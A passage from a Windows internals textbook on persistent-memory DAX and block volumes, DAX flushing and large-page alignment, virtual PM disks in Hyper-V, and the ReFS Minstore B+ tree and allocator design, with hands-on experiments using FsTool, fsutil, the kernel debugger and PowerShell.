Target Volume: q:\ - File system: NTFS - Is DAX Volume:
True.
Great! Both the source and the destination reside on a DAX
volume.
Performing a full System Speed Copy!
Source file size: 4.34 GB
Performing file copy... Success!
Total execution time: 8 Sec.
Copy Speed: 501.60 MB/Sec
Press any key to exit...
The trace collected in the last experiment demonstrates that
memory-mapped I/O on DAX volumes doesn’t generate any
paging I/O. No WriteFile or ReadFile events are visible on either
the source or the target file:
Block volumes
Not all the limitations brought on by DAX volumes are acceptable in certain
scenarios. Windows provides backward compatibility for PM hardware
through block-mode volumes, which are managed by the entire legacy I/O
stack as regular volumes used by rotating and SSD disk. Block volumes
maintain existing storage semantics: all I/O operations traverse the storage
stack on the way to the PM disk class driver. (There are no miniport drivers,
though, because they’re not needed.) They’re fully compatible with all
existing applications, legacy filters, and minifilter drivers.
Persistent memory storage is able to perform I/O at byte granularity. More
accurately, I/O is performed at cache line granularity, which depends on the
architecture but is usually 64 bytes. However, block mode volumes are
exposed as standard volumes, which perform I/O at sector granularity (512
bytes or 4 Kbytes). If a write is in progress on a DAX volume, and suddenly
the drive experiences a power failure, the block of data (sector) contains a
mix of old and new data. Applications are not prepared to handle such a
scenario. In block mode, the sector atomicity is guaranteed by the PM disk
class driver, which implements the Block Translation Table (BTT) algorithm.
The BTT, an algorithm developed by Intel, splits available disk space into
chunks of up to 512 GB, called arenas. For each arena, the algorithm
maintains a BTT, a simple indirection/lookup that maps an LBA to an
internal block belonging to the arena. For each 32-bit entry in the map, the
algorithm uses the two most significant bits (MSB) to store the status of the
block (three states: valid, zeroed, and error). Although the table maintains the
status of each LBA, the BTT algorithm provides sector atomicity by
providing a flog area, which contains an array of nfree blocks.
An nfree block contains all the data that the algorithm needs to provide
sector atomicity. There are 256 nfree entries in the array; an nfree entry is 32
bytes in size, so the flog area occupies 8 KB. Each nfree is used by one CPU,
so the number of nfrees describes the number of concurrent atomic I/Os an
arena can process concurrently. Figure 11-75 shows the layout of a DAX
disk formatted in block mode. The data structures used for the BTT
algorithm are not visible to the file system driver. The BTT algorithm
eliminates possible subsector torn writes and, as described previously, is
needed even on DAX-formatted volumes in order to support file system
metadata writes.
Figure 11-75 Layout of a DAX disk that supports sector atomicity (BTT
algorithm).
Block mode volumes do not have the
GPT_BASIC_DATA_ATTRIBUTE_DAX flag in their partition entry. NTFS
behaves just like with normal volumes by relying on the cache manager to
perform cached I/O, and by processing non-cached I/O through the PM disk
class driver. The Pmem driver exposes read and write functions, which
performs a direct memory access (DMA) transfer by building a memory
descriptor list (MDL) for both the user buffer and device physical block
address (MDLs are described in more detail in Chapter 5 of Part 1). The BTT
algorithm provides sector atomicity. Figure 11-76 shows the I/O stack of a
traditional volume, a DAX volume, and a block volume.
Figure 11-76 Device I/O stack comparison between traditional volumes,
block mode volumes, and DAX volumes.
File system filter drivers and DAX
Legacy filter drivers and minifilters don’t work with DAX volumes. These
kinds of drivers usually augment file system functionality, often interacting
with all the operations that a file system driver manages. There are different
classes of filters providing new capabilities or modifying existing
functionality of the file system driver: antivirus, encryption, replication,
compression, Hierarchical Storage Management (HSM), and so on. The DAX
driver model significantly modifies how DAX volumes interact with such
components.
As previously discussed in this chapter, when a file is mapped in memory,
the file system in DAX mode does not receive any read or write I/O requests,
neither do all the filter drivers that reside above or below the file system
driver. This means that filter drivers that rely on data interception will not
work. To minimize possible compatibility issues, existing minifilters will not
receive a notification (through the InstanceSetup callback) when a DAX
volume is mounted. New and updated minifilter drivers that still want to
operate with DAX volumes need to specify the
FLTFL_REGISTRATION_SUPPORT_DAX_VOLUME flag when they
register with the filter manager through FltRegisterFilter kernel API.
Minifilters that decide to support DAX volumes have the limitation that
they can’t intercept any form of paging I/O. Data transformation filters
(which provide encryption or compression) don’t have any chance of
working correctly for memory-mapped files; antimalware filters are impacted
as described earlier—because they must now perform scans on every open
and close, losing the ability to determine whether or not a write truly
happened. (The impact is mostly tied to the detection of a file last update
time.) Legacy filters are no longer compatible: if a driver calls the
IoAttachDeviceToDevice Stack API (or similar functions), the I/O manager
simply fails the request (and logs an ETW event).
Flushing DAX mode I/Os
Traditional disks (HDD, SSD, NVme) always include a cache that improves
their overall performance. When write I/Os are emitted from the storage
driver, the actual data is first transferred into the cache, which will be written
to the persistent medium later. The operating system provides correct
flushing, which guarantees that data is written to final storage, and temporal
order, which guarantees that data is written in the correct order. For normal
cached I/O, an application can call the FlushFileBuffers API to ensure that
the data is provably stored on the disk (this will generate an IRP with the
IRP_MJ_FLUSH_BUFFERS major function code that the NTFS driver will
implement). Noncached I/O is directly written to disk by NTFS so ordering
and flushing aren’t concerns.
With DAX-mode volumes, this is not possible anymore. After the file is
mapped in memory, the NTFS driver has no knowledge of the data that is
going to be written to disk. If an application is writing some critical data
structures on a DAX volume and the power fails, the application has no
guarantees that all of the data structures will have been correctly written in
the underlying medium. Furthermore, it has no guarantees that the order in
which the data was written was the requested one. This is because PM
storage is implemented as classical physical memory from the CPU’s point
of view. The processor uses the CPU caching mechanism, which uses its own
caching mechanisms while reading or writing to DAX volumes.
As a result, newer versions of Windows 10 had to introduce new flush
APIs for DAX-mapped regions, which perform the necessary work to
optimally flush PM content from the CPU cache. The APIs are available for
both user-mode applications and kernel-mode drivers and are highly
optimized based on the CPU architecture (standard x64 systems use the
CLFLUSH and CLWB opcodes, for example). An application that wants I/O
ordering and flushing on DAX volumes can call RtlGetNonVolatileToken on
a PM mapped region; the function yields back a nonvolatile token that can be
subsequently used with the RtlFlushNonVolatileMemory or
RtlFlushNonVolatileMemoryRanges APIs. Both APIs perform the actual
flush of the data from the CPU cache to the underlying PM device.
Memory copy operations executed using standard OS functions perform,
by default, temporal copy operations, meaning that data always passes
through the CPU cache, maintaining execution ordering. Nontemporal copy
operations, on the other hand, use specialized processor opcodes (again
depending on the CPU architecture; x64 CPUs use the MOVNTI opcode) to
bypass the CPU cache. In this case, ordering is not maintained, but execution
is faster. RtlWriteNonVolatileMemory exposes memory copy operations to
and from nonvolatile memory. By default, the API performs classical
temporal copy operations, but an application can request a nontemporal copy
through the WRITE_NV_MEMORY_FLAG_NON_ TEMPORAL flag and thus
execute a faster copy operation.
Large and huge pages support
Reading or writing a file on a DAX-mode volume through memory-mapped
sections is handled by the memory manager in a similar way to non-DAX
sections: if the MEM_LARGE_PAGES flag is specified at map time, the
memory manager detects that one or more file extents point to enough
aligned, contiguous physical space (NTFS allocates the file extents), and uses
large (2 MB) or huge (1 GB) pages to map the physical DAX space. (More
details on the memory manager and large pages are available in Chapter 5 of
Part 1.) Large and huge pages have various advantages compared to
traditional 4-KB pages. In particular, they boost the performance on DAX
files because they require fewer lookups in the processor’s page table
structures and require fewer entries in the processor’s translation lookaside
buffer (TLB). For applications with a large memory footprint that randomly
access memory, the CPU can spend a lot of time looking up TLB entries as
well as reading and writing the page table hierarchy in case of TLB misses. In
addition, using large/huge pages can also result in significant commit savings
because only page directory parents and page directory (for large files only,
not huge files) need to be charged. Page table space (4 KB per 2 MB of leaf
VA space) charges are not needed or taken. So, for example, with a 2-TB file
mapping, the system can save 4 GB of committed memory by using large and
huge pages.
The NTFS driver cooperates with the memory manager to provide support
for huge and large pages while mapping files that reside on DAX volumes:
■ By default, each DAX partition is aligned on 2-MB boundaries.
■ NTFS supports 2-MB clusters. A DAX volume formatted with 2-MB
clusters is guaranteed to use only large pages for every file stored in
the volume.
■ 1-GB clusters are not supported by NTFS. If a file stored on a DAX
volume is bigger than 1 GB, and if there are one or more file’s extents
stored in enough contiguous physical space, the memory manager will
map the file using huge pages (huge pages use only two pages map
levels, while large pages use three levels).
As introduced in Chapter 5, for normal memory-backed sections, the
memory manager uses large and huge pages only if the extent describing the
PM pages is properly aligned on the DAX volume. (The alignment is relative
to the volume’s LCN and not to the file VCN.) For large pages, this means
that the extent needs to start at at a 2-MB boundary, whereas for huge pages
it needs to start at 1-GB boundary. If a file on a DAX volume is not entirely
aligned, the memory manager uses large or huge pages only on those blocks
that are aligned, while it uses standard 4-KB pages for any other blocks.
In order to facilitate and increase the usage of large pages, the NTFS file
system provides the FSCTL_SET_DAX_ALLOC_ALIGNMENT_HINT
control code, which an application can use to set its preferred alignment on
new file extents. The I/O control code accepts a value that specifies the
preferred alignment, a starting offset (which allows specifying where the
alignment requirements begin), and some flags. Usually an application sends
the IOCTL to the file system driver after it has created a brand-new file but
before mapping it. In this way, while allocating space for the file, NTFS
grabs free clusters that fall within the bounds of the preferred alignment.
If the requested alignment is not available (due to volume high
fragmentation, for example), the IOCTL can specify the fallback behavior
that the file system should apply: fail the request or revert to a fallback
alignment (which can be specified as an input parameter). The IOCTL can
even be used on an already-existing file, for specifying alignment of new
extents. An application can query the alignment of all the extents belonging
to a file by using the FSCTL_QUERY_FILE_REGIONS control code or by
using the fsutil dax queryfilealignment command-line tool.
EXPERIMENT: Playing with DAX file alignment
You can witness the different kinds of DAX file alignment using
the FsTool application available in this book’s downloadable
resources. For this experiment, you need to have a DAX volume
present on your machine. Open a command prompt window and
perform the copy of a big file (we suggest at least 4 GB) into the
DAX volume using this tool. In the following example, two DAX
disks are mounted as the P: and Q: volumes. The Big_Image.iso
file is copied into the Q: DAX volume by using a standard copy
operation, started by the FsTool application:
Click here to view code image
D:\>fstool.exe /copy p:\Big_DVD_Image.iso q:\test.iso
NTFS / ReFS Tool v0.1
Copyright (C) 2018 Andrea Allievi (AaLl86)
Copying "Big_DVD_Image.iso" to "test.iso" file... Success.
Total File-Copy execution time: 10 Sec - Transfer Rate:
495.52 MB/s.
Press any key to exit...
You can check the new test.iso file’s alignment by using the
/queryalign command-line argument of the FsTool.exe application,
or by using the queryFileAlignment argument with the built-in
fsutil.exe tool available in Windows:
Click here to view code image
D:\>fsutil dax queryFileAlignment q:\test.iso
File Region Alignment:
Region Alignment StartOffset
LengthInBytes
0 Other 0
0x1fd000
1 Large 0x1fd000
0x3b800000
2 Huge 0x3b9fd000
0xc0000000
3 Large 0xfb9fd000
0x13e00000
4 Other 0x10f7fd000
0x17e000
As you can read from the tool’s output, the first chunk of the file
has been stored in 4-KB aligned clusters. The offsets shown by the
tool are not volume-relative offsets, or LCN, but file-relative
offsets, or VCN. This is an important distinction because the
alignment needed for large and huge pages mapping is relative to
the volume’s page offset. As the file keeps growing, some of its
clusters will be allocated from a volume offset that is 2-MB or 1-
GB aligned. In this way, those portions of the file can be mapped
by the memory manager using large and huge pages. Now, as in the
previous experiment, let’s try to perform a DAX copy by
specifying a target alignment hint:
Click here to view code image
P:\>fstool.exe /daxcopy p:\Big_DVD_Image.iso q:\test.iso
/align:1GB
NTFS / ReFS Tool v0.1
Copyright (C) 2018 Andrea Allievi (AaLl86)
Starting DAX copy...
Source file path: p:\Big_DVD_Image.iso.
Target file path: q:\test.iso.
Source Volume: p:\ - File system: NTFS - Is DAX Volume:
True.
Target Volume: q:\ - File system: NTFS - Is DAX Volume:
False.
Source file size: 4.34 GB
Target file alignment (1GB) correctly set.
Performing file copy... Success!
Total execution time: 6 Sec.
Copy Speed: 618.81 MB/Sec
Press any key to exit...
P:\>fsutil dax queryFileAlignment q:\test.iso
File Region Alignment:
Region Alignment StartOffset
LengthInBytes
0 Huge 0
0x100000000
1 Large 0x100000000
0xf800000
2 Other 0x10f800000
0x17b000
In the latter case, the file was immediately allocated on the next
1-GB aligned cluster. The first 4-GB (0x100000000 bytes) of the
file content are stored in contiguous space. When the memory
manager maps that part of the file, it only needs to use four page
director pointer table entries (PDPTs), instead of using 2048 page
tables. This will save physical memory space and drastically
improve the performance while the processor accesses the data
located in the DAX section. To confirm that the copy has been
really executed using large pages, you can attach a kernel debugger
to the machine (even a local kernel debugger is enough) and use
the /debug switch of the FsTool application:
Click here to view code image
P:\>fstool.exe /daxcopy p:\Big_DVD_Image.iso q:\test.iso
/align:1GB /debug
NTFS / ReFS Tool v0.1
Copyright (C) 2018 Andrea Allievi (AaLl86)
Starting DAX copy...
Source file path: p:\Big_DVD_Image.iso.
Target file path: q:\test.iso.
Source Volume: p:\ - File system: NTFS - Is DAX Volume:
False.
Target Volume: q:\ - File system: NTFS - Is DAX Volume:
True.
Source file size: 4.34 GB
Target file alignment (1GB) correctly set.
Performing file copy...
[Debug] (PID: 10412) Source and Target file correctly
mapped.
Source file mapping address: 0x000001F1C0000000
(DAX mode: 1).
Target file mapping address: 0x000001F2C0000000
(DAX mode: 1).
File offset : 0x0 - Alignment: 1GB.
Press enter to start the copy...
[Debug] (PID: 10412) File chunk’s copy successfully
executed.
Press enter go to the next chunk / flush the file...
You can see the effective memory mapping using the debugger’s
!pte extension. First, you need to move to the proper process
context by using the .process command, and then you can analyze
the mapped virtual address shown by FsTool:
Click here to view code image
8: kd> !process 0n10412 0
Searching for Process with Cid == 28ac
PROCESS ffffd28124121080
SessionId: 2 Cid: 28ac Peb: a29717c000 ParentCid:
31bc
DirBase: 4cc491000 ObjectTable: ffff950f94060000
HandleCount: 49.
Image: FsTool.exe
8: kd> .process /i ffffd28124121080
You need to continue execution (press 'g' <enter>) for the
context
to be switched. When the debugger breaks in again, you will
be in
the new process context.
8: kd> g
Break instruction exception - code 80000003 (first chance)
nt!DbgBreakPointWithStatus:
fffff804`3d7e8e50 cc int 3
8: kd> !pte 0x000001F2C0000000
VA
000001f2c0000000
PXE at FFFFB8DC6E371018 PPE at FFFFB8DC6E203E58 PDE at
FFFFB8DC407CB000
contains 0A0000D57CEA8867 contains 8A000152400008E7
contains 0000000000000000
pfn d57cea8 ---DA--UWEV pfn 15240000 --LDA--UW-V LARGE
PAGE pfn 15240000
PTE at FFFFB880F9600000
contains 0000000000000000
LARGE PAGE pfn 15240000
The !pte debugger command confirmed that the first 1 GB of
space of the DAX file is mapped using huge pages. Indeed, neither
the page directory nor the page table are present. The FsTool
application can also be used to set the alignment of already existing
files. The FSCTL_SET_DAX_ALLOC_ALIGNMENT_HINT control
code does not actually move any data though; it just provides a hint
for the new allocated file extents, as the file continues to grow in
the future:
Click here to view code image
D:\>fstool e:\test.iso /align:2MB /offset:0
NTFS / ReFS Tool v0.1
Copyright (C) 2018 Andrea Allievi (AaLl86)
Applying file alignment to "test.iso" (Offset 0x0)...
Success.
Press any key to exit...
D:\>fsutil dax queryfileAlignment e:\test.iso
File Region Alignment:
Region Alignment StartOffset
LengthInBytes
0 Huge 0
0x100000000
1 Large 0x100000000
0xf800000
2 Other 0x10f800000
0x17b000
Virtual PM disks and storages spaces support
Persistent memory was specifically designed for server systems and mission-
critical applications, like huge SQL databases, which need a fast response
time and process thousands of queries per second. Often, these kinds of
servers run applications in virtual machines provided by HyperV. Windows
Server 2019 supports a new kind of virtual hard disk: virtual PM disks.
Virtual PMs are backed by a VHDPMEM file, which, at the time of this
writing, can only be created (or converted from a regular VHD file) by using
Windows PowerShell. Virtual PM disks directly map chunks of space located
on a real DAX disk installed in the host, via a VHDPMEM file, which must
reside on that DAX volume.
When attached to a virtual machine, HyperV exposes a virtual PM device
(VPMEM) to the guest. This virtual PM device is described by the
NVDIMM Firmware interface table (NFIT) located in the virtual UEFI
BIOS. (More details about the NVFIT table are available in the ACPI 6.2
specification.) The SCM Bus driver reads the table and creates the regular
device objects representing the virtual NVDIMM device and the PM disk.
The Pmem disk class driver manages the virtual PM disks in the same way as
normal PM disks, and creates virtual volumes on the top of them. Details
about the Windows Hypervisor and its components can be found in Chapter
9. Figure 11-77 shows the PM stack for a virtual machine that uses a virtual
PM device. The dark gray components are parts of the virtualized stack,
whereas light gray components are the same in both the guest and the host
partition.
Figure 11-77 The virtual PM architecture.
A virtual PM device exposes a contiguous address space, virtualized from
the host (this means that the host VHDPMEM files don’t not need to be
contiguous). It supports both DAX and block mode, which, as in the host
case, must be decided at volume-format time, and supports large and huge
pages, which are leveraged in the same way as on the host system. Only
generation 2 virtual machines support virtual PM devices and the mapping of
VHDPMEM files.
Storage Spaces Direct in Windows Server 2019 also supports DAX disks
in its virtual storage pools. One or more DAX disks can be part of an
aggregated array of mixed-type disks. The PM disks in the array can be
configured to provide the capacity or performance tier of a bigger tiered
virtual disk or can be configured to act as a high-performance cache. More
details on Storage Spaces are available later in this chapter.
EXPERIMENT: Create and mount a VHDPMEM
image
As discussed in the previous paragraph, virtual PM disks can be
created, converted, and assigned to a HyperV virtual machine using
PowerShell. In this experiment, you need a DAX disk and a
generation 2 virtual machine with Windows 10 October Update
(RS5, or later releases) installed (describing how to create a VM is
outside the scope of this experiment). Open an administrative
Windows PowerShell prompt, move to your DAX-mode disk, and
create the virtual PM disk (in the example, the DAX disk is located
in the Q: drive):
Click here to view code image
PS Q:\> New-VHD VmPmemDis.vhdpmem -Fixed -SizeBytes 256GB -
PhysicalSectorSizeBytes 4096
ComputerName : 37-4611k2635
Path : Q:\VmPmemDis.vhdpmem
VhdFormat : VHDX
VhdType : Fixed
FileSize : 274882101248
Size : 274877906944
MinimumSize :
LogicalSectorSize : 4096
PhysicalSectorSize : 4096
BlockSize : 0
ParentPath :
DiskIdentifier : 3AA0017F-03AF-4948-80BE-
B40B4AA6BE24
FragmentationPercentage : 0
Alignment : 1
Attached : False
DiskNumber :
IsPMEMCompatible : True
AddressAbstractionType : None
Number :
Virtual PM disks can be of fixed size only, meaning that all the
space is allocated for the virtual disk—this is by design. The
second step requires you to create the virtual PM controller and
attach it to your virtual machine. Make sure that your VM is
switched off, and type the following command. You should replace
“TestPmVm” with the name of your virtual machine):
Click here to view code image
PS Q:\> Add-VMPmemController -VMName "TestPmVm"
Finally, you need to attach the created virtual PM disk to the
virtual machine’s PM controller:
Click here to view code image
PS Q:\> Add-VMHardDiskDrive "TestVm" PMEM -
ControllerLocation 1 -Path 'Q:\VmPmemDis.vhdpmem'
You can verify the result of the operation by using the Get-
VMPmemController command:
Click here to view code image
PS Q:\> Get-VMPmemController -VMName "TestPmVm"
VMName ControllerNumber Drives
------ ---------------- ------
TestPmVm 0 {Persistent Memory Device on
PMEM controller number 0 at location 1}
If you switch on your virtual machine, you will find that
Windows detects a new virtual disk. In the virtual machine, open
the Disk Management MMC snap-in Tool (diskmgmt.msc) and
initialize the disk using GPT partitioning. Then create a simple
volume, assign a drive letter to it, but don’t format it.
You need to format the virtual PM disk in DAX mode. Open an
administrative command prompt window in the virtual machine.
Assuming that your virtual-pm disk drive letter is E:, you need to
use the following command:
Click here to view code image
C:\>format e: /DAX /fs:NTFS /q
The type of the file system is RAW.
The new file system is NTFS.
WARNING, ALL DATA ON NON-REMOVABLE DISK
DRIVE E: WILL BE LOST!
Proceed with Format (Y/N)? y
QuickFormatting 256.0 GB
Volume label (32 characters, ENTER for none)? DAX-In-Vm
Creating file system structures.
Format complete.
256.0 GB total disk space.
255.9 GB are available.
You can then confirm that the virtual disk has been formatted in
DAX mode by using the fsutil.exe built-in tool, specifying the
fsinfo volumeinfo command-line arguments:
Click here to view code image
C:\>fsutil fsinfo volumeinfo C:
Volume Name : DAX-In-Vm
Volume Serial Number : 0x1a1bdc32
Max Component Length : 255
File System Name : NTFS
Is ReadWrite
Not Thinly-Provisioned
Supports Case-sensitive filenames
Preserves Case of filenames
Supports Unicode in filenames
Preserves & Enforces ACL’s
Supports Disk Quotas
Supports Reparse Points
Returns Handle Close Result Information
Supports POSIX-style Unlink and Rename
Supports Object Identifiers
Supports Named Streams
Supports Hard Links
Supports Extended Attributes
Supports Open By FileID
Supports USN Journal
Is DAX Volume
Resilient File System (ReFS)
The release of Windows Server 2012 R2 saw the introduction of a new
advanced file system, the Resilient File System (also known as ReFS). This
file system is part of a new storage architecture, called Storage Spaces,
which, among other features, allows the creation of a tiered virtual volume
composed of a solid-state drive and a classical rotational disk. (An
introduction of Storage Spaces, and Tiered Storage, is presented later in this
chapter). ReFS is a “write-to-new” file system, which means that file system
metadata is never updated in place; updated metadata is written in a new
place, and the old one is marked as deleted. This property is important and is
one of the features that provides data integrity. The original goals of ReFS
were the following:
1.
Self-healing, online volume check and repair (providing close to zero
unavailability due to file system corruption) and write-through
support. (Write-through is discussed later in this section.)
2.
Data integrity for all user data (hardware and software).
3.
Efficient and fast file snapshots (block cloning).
4.
Support for extremely large volumes (exabyte sizes) and files.
5.
Automatic tiering of data and metadata, support for SMR (shingled
magnetic recording) and future solid-state disks.
There have been different versions of ReFS. The one described in this
book is referred to as ReFS v2, which was first implemented in Windows
Server 2016. Figure 11-78 shows an overview of the different high-level
implementations between NTFS and ReFS. Instead of completely rewriting
the NTFS file system, ReFS uses another approach by dividing the
implementation of NTFS into two parts: one part understands the on-disk
format, and the other does not.
Figure 11-78 ReFS high-level implementation compared to NTFS.
ReFS replaces the on-disk storage engine with Minstore. Minstore is a
recoverable object store library that provides a key-value table interface to its
callers, implements allocate-on-write semantics for modification to those
tables, and integrates with the Windows cache manager. Essentially,
Minstore is a library that implements the core of a modern, scalable copy-on-
write file system. Minstore is leveraged by ReFS to implement files,
directories, and so on. Understanding the basics of Minstore is needed to
describe ReFS, so let’s start with a description of Minstore.
Minstore architecture
Everything in Minstore is a table. A table is composed of multiple rows,
which are made of a key-value pair. Minstore tables, when stored on disk, are
represented using B+ trees. When kept in volatile memory (RAM), they are
represented using hash tables. B+ trees, also known as balanced trees, have
different important properties:
1.
They usually have a large number of children per node.
2.
They store data pointers (a pointer to the disk file block that contains
the key value) only on the leaves—not on internal nodes.
3.
Every path from the root node to a leaf node is of the same length.
Other file systems (like NTFS) generally use B-trees (another data
structure that generalizes a binary search-tree, not to be confused with the
term “Binary tree”) to store the data pointer, along with the key, in each node
of the tree. This technique greatly reduces the number of entries that can be
packed into a node of a B-tree, thereby contributing to the increase in the
number of levels in the B-tree, hence increasing the search time of a record.
Figure 11-79 shows an example of B+ tree. In the tree shown in the figure,
the root and the internal node contain only keys, which are used for properly
accessing the data located in the leaf’s nodes. Leaf nodes are all at the same
level and are generally linked together. As a consequence, there is no need to
emit lots of I/O operations for finding an element in the tree.
Figure 11-79 A sample B+ tree. Only the leaf nodes contain data pointers.
Director nodes contain only links to children nodes.
For example, let’s assume that Minstore needs to access the node with the
key 20. The root node contains one key used as an index. Keys with a value
above or equal to 13 are stored in one of the children indexed by the right
pointer; meanwhile, keys with a value less than 13 are stored in one of the
left children. When Minstore has reached the leaf, which contains the actual
data, it can easily access the data also for node with keys 16 and 25 without
performing any full tree scan.
Furthermore, the leaf nodes are usually linked together using linked lists.
This means that for huge trees, Minstore can, for example, query all the files
in a folder by accessing the root and the intermediate nodes only once—
assuming that in the figure all the files are represented by the values stored in
the leaves. As mentioned above, Minstore generally uses a B+ tree for
representing different objects than files or directories.
In this book, we use the term B+ tree and B+ table for expressing the same
concept. Minstore defines different kind of tables. A table can be created, it
can have rows added to it, deleted from it, or updated inside of it. An external
entity can enumerate the table or find a single row. The Minstore core is
represented by the object table. The object table is an index of the location of
every root (nonembedded) B+ trees in the volume. B+ trees can be embedded
within other trees; a child tree’s root is stored within the row of a parent tree.
Each table in Minstore is defined by a composite and a schema. A
composite is just a set of rules that describe the behavior of the root node
(sometimes even the children) and how to find and manipulate each node of
the B+ table. Minstore supports two kinds of root nodes, managed by their
respective composites:
■ Copy on Write (CoW): This kind of root node moves its location
when the tree is modified. This means that in case of modification, a
brand-new B+ tree is written while the old one is marked for deletion.
In order to deal with these nodes, the corresponding composite needs
to maintain an object ID that will be used when the table is written.
■ Embedded: This kind of root node is stored in the data portion (the
value of a leaf node) of an index entry of another B+ tree. The
embedded composite maintains a reference to the index entry that
stores the embedded root node.
Specifying a schema when the table is created tells Minstore what type of
key is being used, how big the root and the leaf nodes of the table should be,
and how the rows in the table are laid out. ReFS uses different schemas for
files and directories. Directories are B+ table objects referenced by the object
table, which can contain three different kinds of rows (files, links, and file
IDs). In ReFS, the key of each row represents the name of the file, link, or
file ID. Files are tables that contain attributes in their rows (attribute code and
value pairs).
Every operation that can be performed on a table (close, modify, write to
disk, or delete) is represented by a Minstore transaction. A Minstore
transaction is similar to a database transaction: a unit of work, sometimes
made up of multiple operations, that can succeed or fail only in an atomic
way. The way in which tables are written to the disk is through a process
known as updating the tree. When a tree update is requested, transactions are
drained from the tree, and no transactions are allowed to start until the update
is finished.
One important concept used in ReFS is the embedded table: a B+ tree that
has the root node located in a row of another B+ tree. ReFS uses embedded
tables extensively. For example, every file is a B+ tree whose roots are
embedded in the row of directories. Embedded tables also support a move
operation that changes the parent table. The size of the root node is fixed and
is taken from the table’s schema.
B+ tree physical layout
In Minstore, a B+ tree is made of buckets. Buckets are the Minstore
equivalent of the general B+ tree nodes. Leaf buckets contain the data that the
tree is storing; intermediate buckets are called director nodes and are used
only for direct lookups to the next level in the tree. (In Figure 11-79, each
node is a bucket.) Because director nodes are used only for directing traffic to
child buckets, they need not have exact copies of a key in a child bucket but
can instead pick a value between two buckets and use that. (In ReFS, usually
the key is a compressed file name.) The data of an intermediate bucket
instead contains both the logical cluster number (LCN) and a checksum of
the bucket that it’s pointing to. (The checksum allows ReFS to implement
self-healing features.) The intermediate nodes of a Minstore table could be
considered as a Merkle tree, in which every leaf node is labelled with the
hash of a data block, and every nonleaf node is labelled with the
cryptographic hash of the labels of its child nodes.
Every bucket is composed of an index header that describes the bucket,
and a footer, which is an array of offsets pointing to the index entries in the
correct order. Between the header and the footer there are the index entries.
An index entry represents a row in the B+ table; a row is a simple data
structure that gives the location and size of both the key and data (which both
reside in the same bucket). Figure 11-80 shows an example of a leaf bucket
containing three rows, indexed by the offsets located in the footer. In leaf
pages, each row contains the key and the actual data (or the root node of
another embedded tree).
Figure 11-80 A leaf bucket with three index entries that are ordered by the
array of offsets in the footer.
Allocators
When the file system asks Minstore to allocate a bucket (the B+ table
requests a bucket with a process called pinning the bucket), the latter needs a
way to keep track of the free space of the underlaying medium. The first
version of Minstore used a hierarchical allocator, which meant that there were
multiple allocator objects, each of which allocated space out of its parent
allocator. When the root allocator mapped the entire space of the volume,
each allocator became a B+ tree that used the lcn-count table schema. This
schema describes the row’s key as a range of LCN that the allocator has taken
from its parent node, and the row’s value as an allocator region. In the
original implementation, an allocator region described the state of each chunk
in the region in relation to its children nodes: free or allocated and the owner
ID of the object that owns it.
Figure 11-81 shows a simplified version of the original implementation of
the hierarchical allocator. In the picture, a large allocator has only one
allocation unit set: the space represented by the bit has been allocated for the
medium allocator, which is currently empty. In this case, the medium
allocator is a child of the large allocator.
Figure 11-81 The old hierarchical allocator.
B+ tables deeply rely on allocators to get new buckets and to find space for
the copy-on-write copies of existing buckets (implementing the write-to-new
strategy). The latest Minstore version replaced the hierarchical allocator with
a policy-driven allocator, with the goal of supporting a central location in the
file system that would be able to support tiering. A tier is a type of the
storage device—for example, an SSD, NVMe, or classical rotational disk.
Tiering is discussed later in this chapter. It is basically the ability to support a
disk composed of a fast random-access zone, which is usually smaller than
the slow sequential-only area.
The new policy-driven allocator is an optimized version (supporting a very
large number of allocations per second) that defines different allocation areas
based on the requested tier (the type of underlying storage device). When the
file system requests space for new data, the central allocator decides which
area to allocate from by a policy-driven engine. This policy engine is tiering-
aware (this means that metadata is always written to the performance tiers
and never to SMR capacity tiers, due to the random-write nature of the
metadata), supports ReFS bands, and implements deferred allocation logic
(DAL). The deferred allocation logic relies on the fact that when the file
system creates a file, it usually also allocates the needed space for the file
content. Minstore, instead of returning to the underlying file system an LCN
range, returns a token containing the space reservation that provides a
guarantee against the disk becoming full. When the file is ultimately written,
the allocator assigns LCNs for the file’s content and updates the metadata.
This solves problems with SMR disks (which are covered later in this
chapter) and allows ReFS to be able to create even huge files (64 TB or
more) in less than a second.
The policy-driven allocator is composed of three central allocators,
implemented on-disk as global B+ tables. When they’re loaded in memory,
the allocators are represented using AVL trees, though. An AVL tree is
another kind of self-balancing binary tree that’s not covered in this book.
Although each row in the B+ table is still indexed by a range, the data part of
the row could contain a bitmap or, as an optimization, only the number of
allocated clusters (in case the allocated space is contiguous). The three
allocators are used for different purposes:
■ The Medium Allocator (MAA) is the allocator for each file in the
namespace, except for some B+ tables allocated from the other
allocators. The Medium Allocator is a B+ table itself, so it needs to
find space for its metadata updates (which still follow the write-to-
new strategy). This is the role of the Small Allocator (SAA).
■ The Small Allocator (SAA) allocates space for itself, for the Medium
Allocator, and for two tables: the Integrity State table (which allows
ReFS to support Integrity Streams) and the Block Reference Counter
table (which allows ReFS to support a file’s block cloning).
■ The Container Allocator (CAA) is used when allocating space for the
container table, a fundamental table that provides cluster
virtualization to ReFS and is also deeply used for container
compaction. (See the following sections for more details.)
Furthermore, the Container Allocator contains one or more entries for
describing the space used by itself.
When the Format tool initially creates the basic data structures for ReFS, it
creates the three allocators. The Medium Allocator initially describes all the
volume’s clusters. Space for the SAA and CAA metadata (which are B+
tables) is allocated from the MAA (this is the only time that ever happens in
the volume lifetime). An entry for describing the space used by the Medium
Allocator is inserted in the SAA. Once the allocators are created, additional
entries for the SAA and CAA are no longer allocated from the Medium
Allocator (except in case ReFS finds corruption in the allocators themselves).
To perform a write-to-new operation for a file, ReFS must first consult the
MAA allocator to find space for the write to go to. In a tiered configuration,
it does so with awareness of the tiers. Upon successful completion, it updates
the file’s stream extent table to reflect the new location of that extent and
updates the file’s metadata. The new B+ tree is then written to the disk in the
free space block, and the old table is converted as free space. If the write is
tagged as a write-through, meaning that the write must be discoverable after
a crash, ReFS writes a log record for recording the write-to-new operation.
(See the “ReFS write-through” section later in this chapter for further
details).
Page table
When Minstore updates a bucket in the B+ tree (maybe because it needs to
move a child node or even add a row in the table), it generally needs to
update the parent (or director) nodes. (More precisely, Minstore uses
different links that point to a new and an old child bucket for every node.)
This is because, as we have described earlier, every director node contains the
checksum of its leaves. Furthermore, the leaf node could have been moved or
could even have been deleted. This leads to synchronization problems; for
example, imagine a thread that is reading the B+ tree while a row is being
deleted. Locking the tree and writing every modification on the physical
medium would be prohibitively expensive. Minstore needs a convenient and
fast way to keep track of the information about the tree. The Minstore Page
Table (unrelated to the CPU’s page table), is an in-memory hash table private
